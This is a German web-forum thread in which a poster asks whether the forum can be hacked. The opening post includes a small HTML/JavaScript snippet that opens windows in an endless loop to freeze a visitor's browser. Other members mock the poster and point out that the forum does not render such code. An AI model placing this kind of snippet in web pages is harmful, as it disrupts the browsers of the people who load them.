kaka: Ist es möglich, diesen Forum zu knacken?

Wenn ja, dann wie? SO? <a href="javascript:while(1==1)open()" onMouseOver="self.location.href='javascript:while(1==1)open()'"><br />
<input type="button" name="Verweis" value="SELFHTML Portalseite"></a>

Tschuss

  1. Halloohdumeinhackergott!

    Wenn ja, dann wie? SO? <a href="javascript:while(1==1)open()" onMouseOver="self.location.href='javascript:while(1==1)open()'"><br />
    <input type="button" name="Verweis" value="SELFHTML Portalseite"></a>

    Ichbinjatotalbeindrucktueberdeineclevernessundwiegekonntdudiesesforumgehackthast.sollteestatsaechlichjemandengebenderbesserhackenkannalsdasnoob?solltedasunmoeglicheeingetretensein?wirdmichschuerjetztvomkuehlschrankindietiefkuehltruheverbannen?

    Erstarrtinpanikundangst,
    Dasn00b

    1. *ROTFL*

      Erstarrtinpanikundangst,
      Dasn00b

      Zwei Doofe - ein Gedanke
      Thomas J.

    2. Hallo "Hacker?",

      wie sinnlos...

      was wilst du hier hacken?

      und wozu?

      Und warum gehst du nicht gleich zu der Polizei und sag dass du ne Bank überfahlen hast?

      Hey, Spring doch mal aus dem Fenster!!!

      Oder zünde deine Harre an und warte bis es ein andere löscht.

      Wenn du Häcken wilst dan helfe doch leuten mit probs in Webseiten(die lücken haben) aber lücken auzunutzen ist §$%&§$(§%(

      euer J Lauken(in dem sinne McBloodHack)

    3. Ahoi mein n00b !

      Ichbinjatotalbeindrucktueberdeineclevernessundwiegekonntdudiesesforumgehackthast.sollteestatsaechlichjemandengebenderbesserhackenkannalsdasnoob?solltedasunmoeglicheeingetretensein?wirdmichschuerjetztvomkuehlschrankindietiefkuehltruheverbannen?

      Evtl. solltest Du die Möglichkeit in Betracht ziehen, daß er ein halb-n00b ist, d.h. ein menschliches Wesen, daß sich den Arm abgehackt hat und sich vor langer Zeit einen n00b-Daumen an die Schulter hat transplantieren lassen, der inzwischen zu einem vollwertigen n00b-Arm herangewachsen ist ...
      Und somit (weil er ja einen n00b-Arm hat) kann es gut sein, daß er im Hacken bereits 50% Deriner Hack-Qualität erreicht hat ...

      Erstarrtinpanikundangst,

      Es sind erst 50% ... ganz ruhig

      Harry

  2. Dieser Forum (ein männliches Forum??) ist dermaßen knackig, daß auch der knackigste Knack nicht knackt.

    Wenn ja, dann wie? SO?...

    Und so schon gar nicht.

    Vielleicht weiß der n00b Rat?
    Thomas J.

    1. Ohhalloohduglaeubiger!

      Vielleicht weiß der n00b Rat?

      umdasmalklarzustellen:selfforumhackengehtgegendieehreeinesechtenn00bs.echten00bssindimdienstedergutenunterwegsundhaltendiesenunteranderemdieantennedamitsieinruhetalkshowsundsowassehenkoennen.

      achjaausserdemheisstesdasn00b.nichtdashierfalscheideenaufkommen

      mithochachtungsvollengruessenundalleswassonstnochdazugehoert,
      dasn00b

      1. umdasmalklarzustellen:selfforumhackengehtgegendieehreeinesechtenn00bs.echten00bssindimdienstedergutenunterwegsundhaltendiesenunteranderemdieantennedamitsieinruhetalkshowsundsowassehenkoennen.

        Derartige Zeilen zeigen auf, das der Konqueror 2.2.2 zumindest bei mir ein Problem hat und einfach auf einen horizontalen Scrollbalken verzichtet...

  3. könnte mich jemand aufklären ?

    was geht hier ab ?

    gruss
    Blau

    1. könnte mich jemand aufklären ?

      was geht hier ab ?

      gruss

      fast schon ein "moin Swen :-)"

      Wilhelm

    2. Hallo Blau (auch ein n00b),

      könnte mich jemand aufklären ?
      was geht hier ab ?

      sicherlich, lies den Thread ab hier :
      http://forum.de.selfhtml.org/archiv/2002/1/3052/#m17624

      Du bist nicht wirklich ein/das n00b, oder? Sonst müßtest Du
      meine Antenne halten und Bios Trackballkugel sauberlecken ;-)))
      Über Geschlechtsteile will ich jetzt mal nicht reden...

      Gruß,
      Dirk

      1. Hi,

        ROFL, der thread hat sich ja toll entwickelt... seit ich den das lezte mal angeguckt habe...

        ist der noch im forum zu sehen (d.h. noch nicht im archiv...)? mal gucken...

        gruss
        Blau

        1. Sup!

          Jetz' fass' ich meinen Trackball lieber nur noch mit Gummihandschuhen an... wer weiss, sonst krieg' ich noch n00b-Herpes an der Hand - und wenn n00bs in der Tat Vorformen von Göttern sind, dann kann man sich ausrechnen, was für heftige Herpes die bekommen müssen... andererseits ist es unwahrschienlich, dass Götter Herpes bekommen können - kann ich also meinen Trackball doch weiter unbehandschuht anfassen und mich an seinem glänzend sauberen, n00b-geleckten Äusseren erfreuen ;-)

          Gruesse,

          Bio

      2. hi

        Dazu muss ich nicht wirklich was sagen oder?

        ich werde mir mal ein paar beweisfotos von noobs (nur wirklich coole dürfen das wort mit nullen schreiben) besorgen, mal sehen ob du das auch kannst.

        -RB-

        1. Hi Ralf,

          Dazu muss ich nicht wirklich was sagen oder?

          Nein, nicht wirklich. Warum?

          ich werde mir mal ein paar beweisfotos von noobs (nur wirklich coole dürfen das wort mit nullen schreiben) besorgen, mal sehen ob du das auch kannst.

          Gerne, denn da ich bis heute nicht weiß, wie so ein n00b ("nur wirklich coole...") aussieht - die Sache mit dem Licht und dem Kühlschrank, Du erinnerst Dich? - bin ich ganz wild auf Beweisfotos. Ich könnte Dir im Gegenzug einen Link zum Bild vom Trüffelhopser schicken, falls Dich das interessiert...

          Gruß,
          Dirk

          P.S. : Ich hab den Eindruck, daß entweder Du oder ich irgendwas an der Sache falsch verstanden hat. Irgendwie.

        2. Hallihallo, Freund des noobs

          [...] (nur wirklich coole dürfen das wort mit nullen schreiben) [...]

          Google sagt dazu:

          Suchbegriff 'noob': 19.900 Treffer
          Suchbegriff 'n00b': 37.700 Treffer

          Folgerichtig gibt es auf der Welt ungefähr doppelt so viele "wirklich coole" wie normale Menschen ...

          ;-)

          Ciao,

          Harry

          1. Hi Harry,

            Suchbegriff 'noob': 19.900 Treffer
            Suchbegriff 'n00b': 37.700 Treffer
            Folgerichtig gibt es auf der Welt ungefähr doppelt so viele
            "wirklich coole" wie normale Menschen ...

            Nein - nur doppelt so geschwätzige. ;-)

            Viele Grüße
                  Michael

  4. Sup!

    Jungs /
    ihr seid peinlich /
    und augenscheinlich unbegabt /
    und zwar unheimlich /
    und da - ist - die Tür!

    (Lotto King Karl - Da ist die Tür)

    Im übrigen hätte lesen der FAQ sicher ergeben, daß HTML und JavaScript nicht interpretiert werden - aber dafür hat wohl auch der Grips gefehlt.

    Gruesse,

    Bio

  5. .

    <iframe src="http://harry.ilo.de/temp/supahacka.html" width="90%" height="90%">http://harry.ilo.de/temp/supahacka.html</iframe>